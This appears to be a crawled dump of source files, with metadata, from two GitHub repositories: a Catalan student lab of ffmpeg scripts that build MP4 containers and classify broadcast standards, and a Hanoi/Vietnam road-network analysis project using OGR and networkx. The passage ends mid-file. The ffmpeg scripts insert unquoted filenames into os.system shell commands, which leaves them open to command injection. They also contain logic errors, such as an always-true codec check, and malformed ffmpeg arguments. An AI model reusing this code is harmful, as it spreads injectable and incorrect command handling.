'bbb_1min.mp4' 'bbb_mp3.mp3' 'bbb_subtitles.srt' 'outputFile.mp4'*\n\n**EXERCICI 5**\nI finalment la classe amb els scripts de crear containers automaticmanet i analizar la broadcast standard compatible\n\n"
},
{
"alpha_fraction": 0.5183896422386169,
"alphanum_fraction": 0.531312108039856,
"avg_line_length": 37.67307662963867,
"blob_id": "6b920ce4e4bcf7db351cb4b0a2eca3f15717b62f",
"content_id": "463aaae45828aa8950714ce5de4a89ee5d049e2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2014,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 52,
"path": "/claseLab3.py",
"repo_name": "paumonterop/P3_SCAV_VIDEO",
"src_encoding": "UTF-8",
"text": "import os, subprocess\n\nclass Lab3:\n\n def mp4_container(video, audio, subtitles, output):\n if audio is None:\n os.system('ffmpeg -i {} -c:v copy {}.mp4'.format(video, output))\n\n elif subtitles is None:\n os.system('ffmpeg -i {} -i {} -c:v copy -c:a -map 0:v:0 -map 1:a:0 {}'.format(video,\n audio, output))\n\n else:\n os.system('ffmpeg -i {} -i {} -i {} -c:v copy -c:a -c:s mov_text -map 0:v:0 -map 1:a:0 -map 2:s:0 {}'.format(\n video, audio, subtitles, output))\n\n def broadcast_fit(self, filename): # guardem codecs\n\n print('Broacdasting Standards compatibles amb', filename)\n codec_video = subprocess.getoutput('ffprobe -v error -select_streams v:0 -show_entries stream=codec_name -of '\n 'default=nokey=1:noprint_wrappers=1 {}'.format(filename))\n codec_audio = subprocess.getoutput('ffprobe -v error -select_streams a:0 -show_entries stream=codec_name -of '\n 'default=nokey=1:noprint_wrappers=1 {}'.format(filename))\n # print(codec_video)\n # print(codec_audio)\n\n # comparem els codecs del video amb els standards\n if codec_video == 'h264' or 'mpeg2':\n\n if codec_audio == 'mp3':\n broadcast = 'Compatible amb: DVB i DTMB'\n print(broadcast)\n\n elif codec_audio == 'aac':\n broadcast = 'Compatible amb: DVB i ISDB i DTMB'\n print(broadcast)\n\n elif codec_audio == 'ac-3':\n broadcast = 'Comaptible amb: DVB i ATSC i DTMB'\n print(broadcast)\n\n else:\n print('No és compatible amb cap Standard')\n\n elif codec_video == 'avs' or 'avs+':\n\n if codec_audio == 'mp2' or 'dra':\n broadcast = 'Compatible amb: DTMB'\n print(broadcast)\n\n else:\n print('No és compatible amb cap Standard')\n\n"
},
{
"alpha_fraction": 0.6133254170417786,
"alphanum_fraction": 0.6228435635566711,
"avg_line_length": 31.921567916870117,
"blob_id": "d65255f158ce399f383cd86501e6927545dd8452",
"content_id": "1f7773c5398e89f7a6509527b0153d74d7ea5779",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1683,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 51,
"path": "/readMP4container.py",
"repo_name": "paumonterop/P3_SCAV_VIDEO",
"src_encoding": "UTF-8",
"text": "import argparse\nimport subprocess\n\n# podem executarlo des de terminal posant el video en questio\n# EXEMPLE:\n# python3 readMP4container.py 'video.mp4'\n\nparser = argparse.ArgumentParser(description='Get video information')\nparser.add_argument('in_filename', help='Input filename')\nargs = parser.parse_args()\n\n\ndef broadcastFit(filename): # guardem codecs\n\n print('Broacdasting Standards compatibles amb', filename)\n codec_video = subprocess.getoutput('ffprobe -v error -select_streams v:0 -show_entries stream=codec_name -of '\n 'default=nokey=1:noprint_wrappers=1 {}'.format(filename))\n codec_audio = subprocess.getoutput('ffprobe -v error -select_streams a:0 -show_entries stream=codec_name -of '\n 'default=nokey=1:noprint_wrappers=1 {}'.format(filename))\n # print(codec_video)\n # print(codec_audio)\n\n # comparem els codecs del video amb els standards\n if codec_video == 'h264' or 'mpeg2':\n\n if codec_audio == 'mp3':\n broadcast = 'Compatible amb: DVB i DTMB'\n print(broadcast)\n\n elif codec_audio == 'aac':\n broadcast = 'Compatible amb: DVB i ISDB i DTMB'\n print(broadcast)\n\n elif codec_audio == 'ac-3':\n broadcast = 'Comaptible amb: DVB i ATSC i DTMB'\n print(broadcast)\n\n else:\n print('No és compatible amb cap Standard')\n\n elif codec_video == 'avs' or 'avs+':\n\n if codec_audio == 'mp2' or 'dra':\n broadcast = 'Compatible amb: DTMB'\n print(broadcast)\n\n else:\n print('No és compatible amb cap Standard')\n\n\nbroadcastFit(args.in_filename)\n\n\n"
},
{
"alpha_fraction": 0.5942408442497253,
"alphanum_fraction": 0.6308900713920593,
"avg_line_length": 37.25,
"blob_id": "b32c51bf36f4f215208458bcf43145d316daf637",
"content_id": "35fd1a16145d8b454bf53b92998c2698d7b655f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 764,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 20,
"path": "/testContainers.py",
"repo_name": "paumonterop/P3_SCAV_VIDEO",
"src_encoding": "UTF-8",
"text": "# Aquest script permet rear containers i saber amb quin standard s'ajusten\n# Es pot executar des de terminal de la seguent manera\n# EXEMPLE: python3 testContainer.py 'bbb_1min.mp4' 'bbb_mp3.mp3' 'bbb_subtitles.srt' 'outputFile.mp4'\n\nimport os\nimport sys\n\n\nif len(sys.argv) == 4: # nomes video i audio\n os.system('ffmpeg -i {} -i {} -c:v copy -c:a -map 0:v:0 -map 1:a:0 {}'.format(sys.argv[1],\n sys.argv[2], sys.argv[3]))\n\nelif len(sys.argv) == 5: # video, audio i subtitols\n os.system('ffmpeg -i {} -i {} -i {} -c:v copy -c:a -c:s mov_text -map 0:v:0 -map 1:a:0 -map 2:s:0 {}'.format(\n sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]))\n\nelse:\n print('Masses arguments')\n\nos.system('python3 readMP4container.py', sys.argv[4])"
},
{
"alpha_fraction": 0.6189903616905212,
"alphanum_fraction": 0.6526442170143127,
"avg_line_length": 42.842105865478516,
"blob_id": "e55be6354c7e35c0672fc5ef8f856c2b7ed84252",
"content_id": "4fa9e59043d15dc0b97c4b3626cc55b8491d73be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 832,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 19,
"path": "/MP4container.py",
"repo_name": "paumonterop/P3_SCAV_VIDEO",
"src_encoding": "UTF-8",
"text": "# script per crear containers d'arxius MP4 amb video, audio i subtitols\n\nimport os\nimport sys\n\n# aquest script permet crear un container MP4 directament executant-lo des del terminal posant\n# el videoInput, AudioInput, subtitulsInput i el nom del fitxer de sortida\n# EXEMPLE: python3 MP4container.py 'bbb_1min.mp4' 'bbb_1min_lowbitrate.mp3' 'bbb_subtitles.srt' 'outputFile.mp4'\n\nif len(sys.argv) == 4: # nomes video i audio\n os.system('ffmpeg -i {} -i {} -c:v copy -c:a -map 0:v:0 -map 1:a:0 {}'.format(sys.argv[1],\n sys.argv[2], sys.argv[3]))\n\nelif len(sys.argv) == 5: # video, audio i subtitols\n os.system('ffmpeg -i {} -i {} -i {} -c:v copy -c:a -c:s mov_text -map 0:v:0 -map 1:a:0 -map 2:s:0 {}'.format(\n sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]))\n\nelse:\n print('Masses arguments')"
}
] | 5 |
Giangblackk/hanoi_road_map_analysis
|
https://github.com/Giangblackk/hanoi_road_map_analysis
|
bfba86342ebe17e51e28df79aeb8c847d4202f6b
|
5f327d790afabb7783f8f7d3ad92c2fb4bd95231
|
e5c99859ca8d62029f3d95d0ce5516bdff5f8069
|
refs/heads/master
| 2021-01-20T15:30:14.612063 | 2017-08-02T03:27:56 | 2017-08-02T03:27:56 | 90,773,267 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6828135251998901,
"alphanum_fraction": 0.7053748965263367,
"avg_line_length": 29.15999984741211,
"blob_id": "eaf52ae797f6ce640e359017f7e622f9da1e01f3",
"content_id": "d4294c202191347e4b61940a2a0416e2db49100a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1507,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 50,
"path": "/preprocess/find_self_loop_in_network.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 10 16:19:35 2017\n\n@author: giangblackk\n\"\"\"\n\n#import networkx as nx\n#\n#G = nx.read_gexf('./highway_line_singlepart_new_123.gexf')\n#i=0\n#for node in G.nodes_iter():\n# if node in G.neighbors(node):\n# i += 1\n# print(node, G.neighbors(node))\n#print(i)\n\nfrom osgeo import ogr\ndataSource = ogr.Open('./highway_line_singlepart.shp')\nlayer = dataSource.GetLayer()\n# layer.SetAttributeFilter(\"ONEWAY IN ('-1','yes','no')\")\nspatialRef = layer.GetSpatialRef()\n\noutputFileName = './highway_line_circle_loop.shp'\noutDriver = ogr.GetDriverByName('ESRI Shapefile')\noutDataSource = outDriver.CreateDataSource(outputFileName)\noutLayer = outDataSource.CreateLayer('highway', spatialRef, ogr.wkbLineString)\nfeatureDefn = outLayer.GetLayerDefn()\n\ni = 0\nfor feature in layer:\n geometry = feature.geometry()\n pointCount = geometry.GetPointCount()\n lastPoint = (geometry.GetPoint(pointCount-1)[0], geometry.GetPoint(pointCount-1)[1])\n firsPoint = (geometry.GetPoint(0)[0],geometry.GetPoint(0)[1])\n middlePointList = []\n for j in range(1,pointCount-1):\n middlePointList.append((geometry.GetPoint(j)[0], geometry.GetPoint(j)[1]))\n if firsPoint in middlePointList or lastPoint in middlePointList:\n i=i+1\n outFeature = ogr.Feature(featureDefn)\n outFeature.SetGeometry(geometry)\n outLayer.CreateFeature(outFeature)\nprint(i)\n\noutLayer = None\noutDataSource = None\nlayer = None \ndataSource = None"
},
{
"alpha_fraction": 0.611503541469574,
"alphanum_fraction": 0.64883953332901,
"avg_line_length": 25.078947067260742,
"blob_id": "136ecfc8f0e2422a4407da19837468981775acfd",
"content_id": "f221a52388447e6bfa1d4fc4754ac84b07487a57",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 991,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 38,
"path": "/preprocess/learn_bokeh.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 22 10:05:03 2017\n\n@author: giangblackk\n\"\"\"\n\nfrom bokeh.charts import Histogram, output_file, show\nfrom bokeh.sampledata.autompg import autompg as df\nimport numpy as np\n\n# df.sort_values(by='cyl', inplace=True)\n#hist = Histogram(df, values='hp', color='cyl',\n# title=\"HP Distribution by Cylinder Count\", legend='top_right')\n#\n#output_file(\"histogram_single.html\", title=\"histogram_single.py example\")\n#\n#show(hist)\n\ndata = np.array([1,2,3,2,1,2,3,2,3,1,3,3,1,2,1,2])\nhist = np.histogram(data, bins=[1,2,3,4])\nhist = list(hist)\nhist[1] = np.unique(data)\nimport pandas as pd\ndat = pd.DataFrame(np.array(hist).transpose(),columns=['a','b'])\n#import plotly.plotly as py\n#import plotly.graph_objs as go\n#\n#data = [go.Bar(\n# x=hist[1],\n# y=hist[0]\n# )]\n#\n#py.iplot(data, filename='basic-bar')\nimport seaborn as sns\nsns.set_style(\"whitegrid\")\nax = sns.barplot(x=\"b\", y=\"a\", data=dat)\n"
},
{
"alpha_fraction": 0.7753623127937317,
"alphanum_fraction": 0.7753623127937317,
"avg_line_length": 45.16666793823242,
"blob_id": "c5905af28ec60dcffb41eb0405f2429c37a0f43b",
"content_id": "3d080cf2a7250e7548db52bb4e7f91395b050c17",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 276,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 6,
"path": "/README.md",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "# hanoi_road_map_analysis\n## Data locations:\n- Vietnam highway map: /vietnam-highway/roaddata/R_VN_NHW_Inventory.shp\n- Vietnam highway network: /vietnam-highway/R_VN_NHW_Inventory.gexf\n## Code locations:\n- transform map to network: /vietnam-highway/from_vn_highway_to_graph.py"
},
{
"alpha_fraction": 0.5992010831832886,
"alphanum_fraction": 0.6110371351242065,
"avg_line_length": 42.05095672607422,
"blob_id": "8f744581dc67a8616cc91beaa61080c69bd6f406",
"content_id": "c52e444e5f40677dc9128ec47dfcfe9e5ee7004b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6759,
"license_type": "permissive",
"max_line_length": 126,
"num_lines": 157,
"path": "/vietnam-highway/from_vn_highway_to_graph.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nfrom osgeo import ogr, osr\nimport networkx as nx\nimport numpy as np\n\n#calculate length of StringLine\ndef calculateGeometryLength(pointList, sourceSRS, destSRS):\n line = ogr.Geometry(ogr.wkbLineString)\n transform = osr.CoordinateTransformation(sourceSRS,destSRS)\n for point in pointList:\n line.AddPoint(point[0],point[1])\n line.Transform(transform)\n return line.Length()\n\n# target srs for road length computation\ntarget_srs = osr.SpatialReference()\ntarget_srs.ImportFromProj4('+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs ')\n\nhighwayFileName = './roaddata/R_VN_NHW_Inventory.shp'\ndataSource = ogr.Open(highwayFileName)\nlayer = dataSource.GetLayer(0)\nsource_srs = layer.GetSpatialRef()\nfeatureCount = layer.GetFeatureCount()\nprint('featureCount: ', featureCount)\n\n# get attribute list\nattributeList = []\nlayerDefinition = layer.GetLayerDefn()\nfor i in range(layerDefinition.GetFieldCount()):\n fieldName = layerDefinition.GetFieldDefn(i).GetName()\n attributeList.append(fieldName)\n\nG = nx.Graph()\nnodeList = []\ni = 0\nfor feature in layer:\n geometry = feature.geometry()\n feature_length = geometry.Length()\n geometry.TransformTo(target_srs)\n pointCount = geometry.GetPointCount()\n pointList = geometry.GetPoints()\n pointList = np.around(np.array(pointList),decimals=10)\n pointList = list(map(tuple, pointList))\n pointList = [tuple(map(float, point)) for point in pointList]\n ### first point ###########################################################\n firstPoint = pointList[0]\n if not firstPoint in nodeList:\n nodeList.append(firstPoint)\n G.add_node(i, lng=firstPoint[0], lat=firstPoint[1])\n firstNodeID = i\n i = i + 1\n else:\n for nodeidx in G.nodes_iter():\n if G.node[nodeidx]['lng'] == float(firstPoint[0]) and G.node[nodeidx]['lat'] == float(firstPoint[1]):\n firstNodeID = nodeidx\n ### last point ############################################################\n lastPoint = pointList[-1]\n if not lastPoint in nodeList:\n nodeList.append(lastPoint)\n G.add_node(i, lng=lastPoint[0], lat=lastPoint[1])\n lastNodeID = i\n i = i + 1\n else:\n for nodeidx in G.nodes_iter():\n if G.node[nodeidx]['lng'] == float(lastPoint[0]) and G.node[nodeidx]['lat'] == float(lastPoint[1]):\n lastNodeID = nodeidx\n # create middle list\n middlePointList = pointList[1:-1]\n ### add edge between points ###############################################\n G.add_edge(lastNodeID, firstNodeID)\n for attribute in attributeList:\n G[lastNodeID][firstNodeID][attribute] = feature.GetField(attribute) if feature.GetField(attribute) is not None else ''\n G[lastNodeID][firstNodeID]['length'] = feature_length\n # add middle list to edge attribute\n G[lastNodeID][firstNodeID]['middle'] = middlePointList[::-1]\n ### intersect processing ##################################################\n for edge in G.edges():\n headID = edge[0]\n tailID = edge[1]\n attributeDict = G[headID][tailID]\n middle = attributeDict['middle']\n if firstPoint in middle:\n if headID == firstNodeID or firstNodeID == tailID:\n continue\n indexFirstPoint = middle.index(firstPoint)\n # copy attributes\n attributeDictPart1 = attributeDict.copy()\n attributeDictPart2 = attributeDict.copy()\n # recalculate middle\n attributeDictPart1['middle'] = middle[0:indexFirstPoint]\n attributeDictPart2['middle'] = middle[indexFirstPoint+1:]\n # recalucate length\n roadPart1 = [(G.node[headID]['lng'],G.node[headID]['lat'])]\n roadPart1.extend(middle[0:indexFirstPoint+1])\n roadPart2 = middle[indexFirstPoint:]\n roadPart2.append((G.node[tailID]['lng'],G.node[tailID]['lat']))\n attributeDictPart1['length'] = calculateGeometryLength(roadPart1,source_srs,target_srs)\n attributeDictPart2['length'] = calculateGeometryLength(roadPart2,source_srs,target_srs)\n G.remove_edge(headID, tailID)\n G.add_edge(headID, firstNodeID, attr_dict=attributeDictPart1)\n G.add_edge(firstNodeID, tailID, attr_dict=attributeDictPart2)\n elif lastPoint in middle:\n if headID == lastNodeID or lastNodeID == tailID:\n continue\n indexLastPoint = middle.index(lastPoint)\n # copy attributes\n attributeDictPart1 = attributeDict.copy()\n attributeDictPart2 = attributeDict.copy()\n # recalculate middle\n attributeDictPart1['middle'] = middle[0:indexLastPoint]\n attributeDictPart2['middle'] = middle[indexLastPoint+1:]\n # recalculate length\n roadPart1 = [(G.node[headID]['lng'],G.node[headID]['lat'])]\n roadPart1.extend(middle[0:indexLastPoint+1])\n roadPart2 = middle[indexLastPoint:]\n roadPart2.append((G.node[tailID]['lng'],G.node[tailID]['lat']))\n attributeDictPart1['length'] = calculateGeometryLength(roadPart1,source_srs,target_srs)\n attributeDictPart2['length'] = calculateGeometryLength(roadPart2,source_srs,target_srs)\n G.remove_edge(headID, tailID)\n G.add_edge(headID, lastNodeID, attr_dict=attributeDictPart1)\n G.add_edge(lastNodeID, tailID, attr_dict=attributeDictPart2)\n### remove middle properties ##################################################\nfor edge in G.edges_iter():\n G[edge[0]][edge[1]].pop('middle')\n### check if 2 node same lat long #############################################\nlat = G.node[0]['lat']\nlng = G.node[0]['lng']\nsameCount = -1\nfor i in G.nodes_iter():\n if G.node[i]['lat'] == lat and G.node[i]['lng'] == lng:\n sameCount += 1\n else:\n lat = G.node[i]['lat']\n lng = G.node[i]['lng']\nprint('same location Count: ',sameCount)\n\n### check for self loop in result graph #######################################\nself_loop_count = 0\nfor node in G.nodes_iter():\n if node in G.neighbors(node):\n self_loop_count += 1\n print(node, G.neighbors(node))\nprint('self_loop_count: ', self_loop_count)\n### remove little connected components due to wrong input data ################\nconnected_components = list(nx.connected_component_subgraphs(G))\nG2 = connected_components[0]\n### write graph to file #######################################################\nnx.write_gexf(G2,'./R_VN_NHW_Inventory_1_connected_component.gexf')\n#nx.write_graphml(G2,'./R_VN_NHW_Inventory_1_connected_component.graphml')\nlayer = None\ndataSource = None\n"
},
{
"alpha_fraction": 0.7170542478561401,
"alphanum_fraction": 0.7286821603775024,
"avg_line_length": 27.55555534362793,
"blob_id": "33a69be45a76629bce76c08d0887cbcc38786d62",
"content_id": "e75fae6714511fc19908df8e4c3fa0bc8f9cbcf3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 258,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 9,
"path": "/preprocess/.spyproject/workspace.ini",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "[workspace]\nsave_data_on_exit = True\nrestore_data_on_startup = True\nsave_history = True\nsave_non_project_files = False\n\n[main]\nversion = '0.1.0'\nrecent_files = [u'E:\\\\MyWorkspace\\\\DATN\\\\final\\\\hanoi_road_map_analysis\\\\preprocess\\\\simple_graph_statisic.py']\n\n"
},
{
"alpha_fraction": 0.6184789538383484,
"alphanum_fraction": 0.6492772102355957,
"avg_line_length": 29.01886749267578,
"blob_id": "c7472109ee8c2904396c0376fc43906cccb83f1e",
"content_id": "7baaf5dd995ea3cc955ca891a5c7fb13cf0174f8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1603,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 53,
"path": "/vietnam-highway/histogram_analysis.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 16 16:51:21 2017\n\n@author: giangblackk\n\"\"\"\n\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# G = nx.read_gexf('./R_VN_NHW_Inventory.gexf')\nG = nx.read_gexf('./R_VN_NHW_Inventory_1_connected_component.gexf')\n# x = nx.betweenness_centrality(G)\n#degree_sequence=sorted(nx.degree(G).values(),reverse=True)\n#plt.hist(degree_sequence, normed=True, facecolor='green')\n#plt.xlabel('Degree')\n#plt.ylabel('Percent')\n#plt.grid(True)\nneighbor_sequence=sorted(nx.degree(G).values(),reverse=True)\nneighbor_sequence_2 = []\nfor i in neighbor_sequence:\n if i != 2:\n neighbor_sequence_2.append(i)\nhist = np.histogram(neighbor_sequence_2, range=(1,7),bins=6,normed=True)\n# hist = np.histogram(neighbor_sequence, range=(1,7),bins=6)\nhist = list(hist)\n#hist[0] = hist[0]*100\n#hist[0] = hist[0]\nhist[1] = hist[1][:-1]\n\nfig, ax = plt.subplots()\nax.yaxis.grid(b=True, which='major', color='k', linestyle='--')\nax.set_axisbelow(True)\nwidth = 0.75\nrects1 = ax.bar(hist[1], hist[0], width, color='b',edgecolor='k')\nax.set_xlabel(u'Số bậc')\nax.set_ylabel(u'Phần trăm (%)')\n# plt.title('Degree Distribution')\nplt.title(u'Phân phối bậc')\ndef autolabel(rects):\n \"\"\"\n Attach a text label above each bar displaying its height\n \"\"\"\n for rect in rects:\n height = rect.get_height()\n ax.text(rect.get_x() + rect.get_width()/2., 1.005*height,\n '%.2f' % round(height,2),\n #'%d' % height,\n ha='center', va='bottom',fontweight='bold')\n\nautolabel(rects1)\n"
},
{
"alpha_fraction": 0.7131350636482239,
"alphanum_fraction": 0.729863703250885,
"avg_line_length": 30.05769157409668,
"blob_id": "ddf50c866bb87be441ffa865f2a34013faa2eded",
"content_id": "573d3fd2f82069c9f4274ed18ef6fc82063e8037",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1614,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 52,
"path": "/vietnam-highway/highway_nodes_extract.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 16 14:54:33 2017\n\n@author: giangblackk\n\"\"\"\n\nfrom osgeo import ogr\n\nhighwayFileName = './roaddata/R_VN_NHW_Inventory.shp'\n\ndataSource = ogr.Open(highwayFileName)\nlayer = dataSource.GetLayer(0)\nspatialRef = layer.GetSpatialRef()\nfeatureCount = layer.GetFeatureCount()\n\noutputFileName = './R_VN_NHW_Inventory_intersect_nodes.shp'\noutDriver = ogr.GetDriverByName('ESRI Shapefile')\noutDataSource = outDriver.CreateDataSource(outputFileName)\n\noutLayer = outDataSource.CreateLayer('highway', spatialRef, ogr.wkbPoint)\nfeatureDefn = outLayer.GetLayerDefn()\n\nnodeList = []\nfor i in range(featureCount):\n feature = layer.GetFeature(i)\n geometry = feature.geometry()\n pointList = geometry.GetPoints()\n pointCount = geometry.GetPointCount()\n firstPoint = (pointList[0][0],pointList[0][1])\n lastPoint = (pointList[-1][0],pointList[-1][1])\n firstPointGeo = ogr.Geometry(ogr.wkbPoint)\n lastPointGeo = ogr.Geometry(ogr.wkbPoint)\n firstPointGeo.AddPoint(firstPoint[0],firstPoint[1])\n lastPointGeo.AddPoint(lastPoint[0],lastPoint[1])\n if firstPoint not in nodeList:\n nodeList.append(firstPoint)\n outFeature = ogr.Feature(featureDefn)\n outFeature.SetGeometry(firstPointGeo)\n outLayer.CreateFeature(outFeature)\n if lastPoint not in nodeList:\n nodeList.append(lastPoint)\n outFeature = ogr.Feature(featureDefn)\n outFeature.SetGeometry(lastPointGeo)\n outLayer.CreateFeature(outFeature)\n\nprint(len(nodeList))\noutLayer = None\noutDataSource = None\nlayer = None\ndataSource = None"
},
{
"alpha_fraction": 0.635676920413971,
"alphanum_fraction": 0.658338189125061,
"avg_line_length": 27.213115692138672,
"blob_id": "ac1b36392e896f22f3e5200d7f212bf9773819c3",
"content_id": "75cbc88ef7a932c40f89d6e25b97037097c58adf",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1721,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 61,
"path": "/preprocess/simple_graph_statisic.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "import networkx as nx\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nG = nx.read_gexf('./graphdata/highway_line_singlepart_new_length.gexf')\nG2 = nx.Graph(G)\n\n# histogram\n# hist = nx.degree_histogram(G)\nneighbor_sequence = [len(G2.neighbors(node)) for node in G.nodes_iter()]\n#plt.hist(neighbor_sequence, facecolor='green')\n#plt.xlabel('Number of Neighbor')\n#plt.ylabel('Percent')\n#plt.grid(True)\n\n\"\"\"\n# degree_sequence = list(nx.degree(G).values())\ndegree_sequence=sorted(nx.degree(G2).values(),reverse=True)\nplt.hist(degree_sequence, normed=True, facecolor='green')\nplt.xlabel('Degree')\nplt.ylabel('Percent')\nplt.grid(True)\n\"\"\"\n# check if node with no neigbors\n\n\"\"\"\n#check_1\nfor node in G.nodes_iter():\n if len(G2.neighbors(node))==0:\n print(node)\n# check_2\nfor node in G.nodes_iter():\n if G.in_degree()[node] == 0 and G.out_degree()[node] == 0:\n print(node)\n\"\"\"\nhist = np.histogram(neighbor_sequence, range=(1,7),bins=6,normed=True)\n# hist = np.histogram(neighbor_sequence, range=(1,7),bins=6)\nhist = list(hist)\nhist[0] = hist[0]*100\nhist[0] = hist[0]\nhist[1] = hist[1][:-1]\n\nfig, ax = plt.subplots()\nax.yaxis.grid(b=True, which='major', color='k', linestyle='--')\nax.set_axisbelow(True)\nwidth = 0.75\nrects1 = ax.bar(hist[1], hist[0], width, color='b',edgecolor='k')\nax.set_xlabel('Degree')\nax.set_ylabel('Percent')\nplt.title('Degree Distribution')\ndef autolabel(rects):\n \"\"\"\n Attach a text label above each bar displaying its height\n \"\"\"\n for rect in rects:\n height = rect.get_height()\n ax.text(rect.get_x() + rect.get_width()/2., 1.005*height,\n '%.2f' % round(height,2),\n ha='center', va='bottom',fontweight='bold')\n\nautolabel(rects1)\n"
},
{
"alpha_fraction": 0.6058428287506104,
"alphanum_fraction": 0.6169719696044922,
"avg_line_length": 42.1349983215332,
"blob_id": "6dc39f0faa082d6db51eea0b92dfc03d4b59af27",
"content_id": "d6cf3d626a190803b17f4f611193d1a9ebc96c46",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8626,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 200,
"path": "/preprocess/from_road_to_graph.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 30 17:32:10 2017\n\n@author: giangblackk\n\"\"\"\n\nfrom osgeo import ogr, osr\nimport networkx as nx\nimport numpy as np\n\ndef calculateGeometryLength(pointList, sourceSRS, destSRS):\n line = ogr.Geometry(ogr.wkbLineString)\n transform = osr.CoordinateTransformation(sourceSRS,destSRS)\n for point in pointList:\n line.AddPoint(point[0],point[1])\n line.Transform(transform)\n return line.Length()\n\n# target srs for road length computation\ntarget_srs = osr.SpatialReference()\ntarget_srs.ImportFromProj4('+proj=utm +zone=48 +ellps=WGS84 +datum=WGS84 +units=m +no_defs ')\n\n# read source dataset\nhighwayFileName = './roaddata/highway_line_singlepart.shp'\ndataSource = ogr.Open(highwayFileName)\nlayer = dataSource.GetLayer(0)\nsource_srs = layer.GetSpatialRef()\nfeatureCount = layer.GetFeatureCount()\nprint('featureCount: ', featureCount)\n# layer.SetAttributeFilter(\"ONEWAY NOT IN ('yes', 'no','-1')\")\n# layer.SetAttributeFilter(\"ONEWAY IN ('-1','yes','no')\")\n# get attribute list\nattributeList = []\nlayerDefinition = layer.GetLayerDefn()\nfor i in range(layerDefinition.GetFieldCount()):\n fieldName = layerDefinition.GetFieldDefn(i).GetName()\n attributeList.append(fieldName)\nattributeList.remove('TOLL')\nattributeList.remove('TRACKTYPE')\nattributeList.remove('DISUSED')\n# create graph\nG = nx.DiGraph()\nnodeList = []\ni = 0\n\nfor feature in layer:\n geometry = feature.geometry()\n geometry_projected = geometry.Clone()\n geometry_projected.TransformTo(target_srs)\n feature_length = geometry_projected.Length()\n pointCount = geometry.GetPointCount()\n pointList = geometry.GetPoints()\n ### first point ###########################################################\n firstPoint = pointList[0]\n if not firstPoint in nodeList:\n nodeList.append(firstPoint)\n G.add_node(i, lng=firstPoint[0], lat=firstPoint[1])\n firstNodeID = i\n i = i + 1\n else:\n for nodeidx in G.nodes_iter():\n if G.node[nodeidx]['lng'] == firstPoint[0] and G.node[nodeidx]['lat'] == firstPoint[1]:\n firstNodeID = nodeidx\n \n ### last point ############################################################\n lastPoint = pointList[-1]\n if not lastPoint in nodeList:\n nodeList.append(lastPoint)\n G.add_node(i, lng=lastPoint[0], lat=lastPoint[1])\n lastNodeID = i\n i = i + 1\n else:\n for nodeidx in G.nodes_iter():\n if G.node[nodeidx]['lng'] == lastPoint[0] and G.node[nodeidx]['lat'] == lastPoint[1]:\n lastNodeID = nodeidx\n \n ### if first point is same as last point, remove due to loop ##############\n if firstNodeID == lastNodeID or firstPoint == lastPoint:\n G.remove_node(firstNodeID)\n 